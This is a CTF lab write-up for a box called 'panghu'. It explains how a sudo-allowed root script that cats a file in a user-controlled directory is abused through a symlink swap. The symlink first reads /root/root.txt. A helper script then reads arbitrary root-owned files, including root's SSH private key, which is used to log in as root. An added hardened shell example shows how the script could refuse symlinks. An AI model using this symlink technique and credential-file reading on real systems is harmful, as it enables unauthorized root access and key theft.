panghu writeup (retrospective)


This is a simple target box, but there was one point I didn't think of; I was stuck on it for a long time and switched to coward mode.
The login is ssh/panghu.

Stage one (reading /root/root.txt)

There is a script that can be run with sudo:

jan:/etc/ssh$ sudo -l
[sudo] password for ssh:
Matching Defaults entries for ssh on jan:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User ssh may run the following commands on jan:
(root) PASSWD: /opt/lzh.sh
jan:/etc/ssh$ cat /opt/lzh.sh
#!/bin/sh

cd /home/ssh
cat backup/hi

All it does is display /home/ssh/backup/hi.
Now the goal is: how can this script be used to read /root/root.txt?
There is no permission to modify hi; in fact there are no permissions on hi at all.
But I do have execute permission on the backup directory. It can't be deleted, so rename backup,
then create a new backup and use a symlink, and the file can be read.
(I kept thinking about the hi file itself, but in fact there was nothing there.)

ln -sv /root/root.txt /home/ssh/backup/hi
sudo /opt/lzh.sh
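The root cause above is that a root-privileged script reads a path whose directory the unprivileged user controls, so a symlink swap redirects the read. The following is an added example, not the challenge's own /opt/lzh.sh, of how such a script could have been written to refuse that swap: it walks the relative path one component at a time and aborts if any component is a symlink or a dot component, and only prints regular files. The function name `safe_cat` and its two parameters (base directory, relative path) are hypothetical names chosen here.

```sh
#!/bin/sh
# Added example (not the challenge's own /opt/lzh.sh): a hardened stand-in.
# The original does `cd /home/ssh; cat backup/hi` as root, so anyone who can
# rename and recreate `backup` can make `backup/hi` a symlink to any file.
# This version walks the relative path one component at a time and refuses
# to print anything if any component is a symlink or a dot component, or if
# the final target is not a regular file. The base directory and relative
# path are parameters (hypothetical names), not the challenge's fixed values.
#
# Usage: safe_cat BASE_DIR RELATIVE_PATH
# Exit status 0 (file printed) or 1 (refused).

safe_cat() {
    base="$1"
    rel="$2"
    cur="$base"
    rest="$rel"

    # Split RELATIVE_PATH on '/' without relying on IFS or word splitting.
    while [ -n "$rest" ]; do
        part="${rest%%/*}"
        if [ "$part" = "$rest" ]; then
            rest=""
        else
            rest="${rest#*/}"
        fi
        # Skip empty components produced by leading, doubled or trailing slashes.
        if [ -z "$part" ]; then
            continue
        fi
        case "$part" in
            .|..)
                echo "refused: '.' and '..' are not allowed in the path" >&2
                return 1
                ;;
        esac
        cur="$cur/$part"
        # The core check: a symlink anywhere in the chain means the caller
        # could have pointed it outside the intended directory.
        if [ -L "$cur" ]; then
            echo "refused: $cur is a symbolic link" >&2
            return 1
        fi
    done

    # Only ordinary files are shown (no directories, devices or FIFOs).
    if [ ! -f "$cur" ]; then
        echo "refused: $cur is not a regular file" >&2
        return 1
    fi
    cat "$cur"
}

# Example invocation mirroring the challenge layout (adjust paths as needed):
# safe_cat /home/ssh backup/hi
```

Note that the check and the `cat` are still two separate operations, so a determined attacker with write access to the directory could race them; the robust fix is to not read from a user-writable location under sudo at all (for example, keep the backup under a root-owned directory, or drop the sudo rule), with the component check as defence in depth.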

Stage two

From stage one we know that lzh.sh can be used to read the contents of any file,
so we can write a script for it. The script content comes from eviden in the group chat:

#!/bin/sh
# Remove any existing backup directory so the symlink can be placed there
if [ -e "backup" ]; then
    rm -rf backup
    echo "removed"
fi
mkdir -p backup
source_file=$1
# Point backup/hi at the file to read; lzh.sh then cats it as root
ln -snv "$source_file" "/home/ssh/backup/hi"
sudo /opt/lzh.sh

This way files can be read automatically.
We go read the ssh configuration; the idea is to read the private key and then log in as root.

Found the location of the ssh private key, but it is not id_rsa, it is id_ed25519, and the directory is under root's home, not the ssh user's. I kept wondering why I had the private key but still couldn't log in as root, hhhhh.

jan:~$ ./m.sh /etc/ssh/ssh_config
removed
'backup/hi' -> '/etc/ssh/ssh_config'
# $OpenBSD: ssh_config,v 1.36 2023/08/02 23:04:38 djm Exp $

# This is the ssh client system-wide configuration file. See
# ssh_config(5) for more information. This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
# 1. command line options
# 2. user-specific file
# 3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options. For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

# Include configuration snippets before processing this file to allow the
# snippets to override directives set in this file.
#Include /etc/ssh/ssh_config.d/*.conf
#Banner /etc/shadow
# Host *
# ForwardAgent no
# ForwardX11 no
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# BatchMode no
# CheckHostIP no
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
# UserKnownHostsFile ~/.ssh/known_hosts.d/%k
jan:~$ ./m.sh /root/.ssh/id_ed25519

vi id_rsa
chmod 600 id_rsa
ssh root@192.168.240.15 -i id_rsa

Logged in as root.